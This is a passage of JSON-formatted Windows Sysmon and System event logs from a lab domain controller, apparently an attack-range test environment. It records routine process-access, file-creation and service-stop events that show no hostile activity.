286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6606,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6607,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6608,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6609,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6610,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6611,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6612,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21E1-5F25-0000-0010B7320A00}\r\nTargetProcessId: 3376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21E1-5F25-0000-0010B7320A00}","TargetProcessId":"3376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6613,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:47.711\r\nProcessGuid: {41C8662E-21DE-5F25-0000-0010E6260A00}\r\nProcessId: 3984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f90-0\\System.Data.dll\r\nCreationUtcTime: 2020-08-01 08:03:47.711","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:47.711","ProcessGuid":"{41C8662E-21DE-5F25-0000-0010E6260A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f90-0\\System.Data.dll","CreationUtcTime":"2020-08-01 08:03:47.711","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76874,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Tile Data model server service entered the stopped state.","param1":"Tile Data model server","param2":"stopped","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6614,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:47.851\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21E3-5F25-0000-0010B6350A00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\